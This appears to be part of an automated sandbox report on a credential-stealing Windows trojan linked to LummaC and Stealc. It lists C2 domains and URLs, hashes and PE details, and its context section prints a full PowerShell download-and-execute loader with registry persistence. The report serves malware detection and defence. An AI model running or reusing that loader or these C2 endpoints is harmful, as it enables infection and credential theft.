              necklacedmny.store23%VirustotalBrowse
              fp2e7a.wpc.phicdn.net0%VirustotalBrowse
              presticitpo.store11%VirustotalBrowse
              thumbystriw.store15%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.96.3
              		truetrueunknown
              fp2e7a.wpc.phicdn.net
              		192.229.221.95
              		truefalseunknown
              presticitpo.store
              		unknown
              		unknowntrueunknown
              thumbystriw.store
              		unknown
              		unknowntrueunknown
              crisiwarny.store
              		unknown
              		unknowntrue
                		unknown
                fadehairucw.store
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  https://necklacedmny.store/apitrue
                    		unknown
                    presticitpo.storetrue
                      		unknown
                      scriptyprefej.storetrue
                        		unknown
                        necklacedmny.storetrue
                          		unknown
                          fadehairucw.storetrue
                            		unknown
                            navygenerayk.storetrue
                              		unknown
                              founpiuer.storetrue
                                		unknown
                                thumbystriw.storetrue
                                  		unknown
                                  crisiwarny.storetrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://necklacedmny.store/W1file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmptrue
                                      		unknown
                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://necklacedmny.store:443/apiicrosoftfile.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmptrue
                                          		unknown
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://necklacedmny.store/api8file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129236427.0000000001650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmptrue
                                              		unknown
                                              https://necklacedmny.store/apixfile.exe, 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmptrue
                                                		unknown
                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://necklacedmny.store/apiUfile.exe, 00000000.00000002.2133401840.0000000001651000.00000004.00000020.00020000.00000000.sdmptrue
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://necklacedmny.store/dfile.exe, 00000000.00000003.2101201718.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100291812.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073292088.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074182580.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2111114745.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2134598475.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129063200.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073166648.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072961661.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmptrue
                                                      		unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctafile.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://necklacedmny.store/edfile.exe, 00000000.00000002.2134513001.0000000005D30000.00000004.00000800.00020000.00000000.sdmptrue
                                                        		unknown
                                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://necklacedmny.store/file.exe, file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089267859.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100311602.000000000163D000.00000004.00000020.00020000.00000000.sdmptrue
                                                          		unknown
                                                          https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://necklacedmny.store:443/api.default-release/key4.dbPKfile.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmptrue
                                                            		unknown
                                                            http://x1.c.lencr.org/0file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://x1.i.lencr.org/0file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://necklacedmny.store/apiZfile.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                              		unknown
                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://necklacedmny.store/?19file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  		unknown
                                                                  https://necklacedmny.store/G11file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmptrue
                                                                    		unknown
                                                                    https://necklacedmny.store/api0file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      		unknown
                                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://necklacedmny.store/apisnfile.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmptrue
                                                                        		unknown

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        188.114.96.3
                                                                        		necklacedmny.storeEuropean Union
                                                                        		13335CLOUDFLARENETUStrue

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1545111
                                                                        Start date and time:2024-10-30 06:15:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 19s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:3
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:file.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                        EGA Information:Failed
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 2
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Stop behavior analysis, all processes terminated

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
                                                                        • Execution Graph export aborted for target file.exe, PID 6136 because there are no executed function
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        01:15:58API Interceptor10x Sleep call for process: file.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        188.114.96.30JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 977255cm.nyashkoon.in/secureWindows.php
                                                                        zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                        • touxzw.ir/alpha2/five/fre.php
                                                                        QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • filetransfer.io/data-package/jI82Ms6K/download
                                                                        9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                                                        DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                        • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                        R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                        • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                        7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                        • www.globaltrend.xyz/b2h2/
                                                                        transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                        • paste.ee/d/Gitmx
                                                                        19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zonguldakescortg.xyz/483l/
                                                                        PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                                                        • www.rtpngk.xyz/876i/

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                        • 188.114.96.3
                                                                        fp2e7a.wpc.phicdn.nethttps://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
                                                                        • 192.229.221.95
                                                                        https://alcatrazpackages.com/elchapo.htmlGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        https://docs.google.com/uc?export=download&id=1gucHUhrnC0jRDGAhRfRkCK8rYqf0o3cvGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        https://docs.google.com/uc?export=download&id=1rG5XITnDsiVQCEMAfg1Ex3pDcYxrlv0NGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        https://email.email.pandadoc.net/c/eJxMkE9vEzEQxT_N-pbKO_ba3oMPhWipiEBAoYdeqrE92zVJbGfthD-fHkWi0OOM9Hv6vResU8LNhoXsz0dK7SkG-2Z5fwRKPgf39rRsv4op3T4ujGyvBQcQIxi2WBVmDUaIIJAgaJrROA0G-iB6wRWyaIGD7DmMvZYDqJtej653A7hxHASXppOcjhgPNwVTwJD9TaLGYn1qK3pCdyDb1jOxg11aK7UTtx1MHUxYyn_E52MH04t-B9MFOjG1vKfUia3X2M_Kjc7LORAnLZT03Ds1eE-GBjOKAXojOzGxlFuco8cWc7rOMAQynlBsvBtgI0GJDY6Ob0hzI7AHR0GxvD5jir__QXSR97_ybpvLA1U6_hxPwWtiq625LJE6yfex4rnlgmurV3u20iXWv7hvCj6bWb97PBX_PTp1rg_yE2v2peCm4fpM7fWnUnp9s4sF9iOv-1rQ0zXU7Bzsvn3A0PT9nfmCQ_ioy92fAAAA__-PeqWAGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$HRBRG='https://hdlclub2.cc/work/das.php?7387';$VHFTQMWZL=(New-Object%20System.Net.WebClient).DownloadString($HRBRG);$ZLFHWXDCL=%5BSystem.Convert%5D::FromBase64String($VHFTQMWZL);$asd%20=%20Get-Random%20-Minimum%20-5%20-Maximum%2012;%20$ATADDMBRA=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CYWYSGSQHQ'+$asd;if%20(!(Test-Path%20$ATADDMBRA%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$ATADDMBRA%20-ItemType%20Directory%20%7D;$p=Join-Path%20$ATADDMBRA%20'CXCC.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$ZLFHWXDCL);try%20%7B%20%20%20%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$ATADDMBRA)%7D%20catch%20%7B%20%20%20%20Write-Host%20'Failed:%20'%20+%20$_;%20%20%20%20exit%7D;$CV=Join-Path%20$ATADDMBRA%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7BWrite-Host%20'No%20exe.'%7D;$fd=Get-Item%20$ATADDMBRA%20-Force;%20$fd.attributes='Hidden';$s=$ATADDMBRA+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='NXXUI';$ASDASD='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$ASDASD;Get hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        https://frs1sctxxr.shop/1stSourceGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        https://www.directo.com.bo/dokGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95
                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                        • 192.229.221.95
                                                                        ORDER-241029-44789AC.vbsGet hashmaliciousUnknownBrowse
                                                                        • 192.229.221.95

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        CLOUDFLARENETUSStatement JULY #U007e SEP 2024 USD 19,055.00.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 172.67.74.152
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        0JLWNg4Sz1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        • 188.114.96.3
                                                                        XhYAqi0wi5.exeGet hashmaliciousStealcBrowse
                                                                        • 172.67.179.207
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 188.114.97.3
                                                                        Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.97.3
                                                                        file.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 172.64.41.3
                                                                        z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                        • 188.114.97.3
                                                                        https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5Get hashmaliciousUnknownBrowse
                                                                        • 172.67.132.160

                                                                        JA3 Fingerprints

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3
                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                        • 188.114.96.3

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        No created / dropped files found

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.538064351181556
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:file.exe
                                                                        File size:2'975'744 bytes
                                                                        MD5:263307cbc603bef82f9365cc2fd70b46
                                                                        SHA1:7b6eda920d7b71d23befdaca8a40362c8aadd4cf
                                                                        SHA256:5db93dc71e9af5cd5df48dc571a0f7d08430bdcec03292a88928436ae0c75708
                                                                        SHA512:6b6db6307568d7009a457fc5d8a40a70abee6570fb11cd715cb537e0733b24b68a55e2e67dff6221ee0990f7bdc22789ff4572dc35c0540b17bc07613a48d68a
                                                                        SSDEEP:49152:zBbV1o75LBL8F04a/P3+WlBVyRlvq2CRwinLKri:lb3WNBL8q4aXlBwRlvMLMi
                                                                        TLSH:60D52A62E50972DBE44E27B4A92FCD42996D07F5073505C3AC69F4BB7E63CC112BAC28
                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........p0...........@...........................0......|-...@.................................T...h..

                                                                        File Icon

                                                                        Icon Hash:00928e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x707000
                                                                        Entrypoint Section:.taggant
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:6
                                                                        OS Version Minor:0
                                                                        File Version Major:6
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:6
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        jmp 00007F4668EB526Ah
                                                                        cmovbe ebp, dword ptr [00000000h]
                                                                        add cl, ch
                                                                        add byte ptr [eax], ah
